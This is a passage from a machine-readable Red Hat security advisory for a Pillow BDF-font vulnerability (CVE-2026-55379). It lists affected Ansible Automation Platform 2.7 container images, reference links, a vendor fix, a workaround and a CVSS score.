"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "RHBZ#2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55379",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55379"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc"
}
],
"release_date": "2026-07-06T18:52:11.633000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Do not load BDF font files from untrusted sources. Applications that only process standard image formats (PNG, JPEG, etc.) and do not use BdfFontFile or ImageFont.load() with BDF files are not affected.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
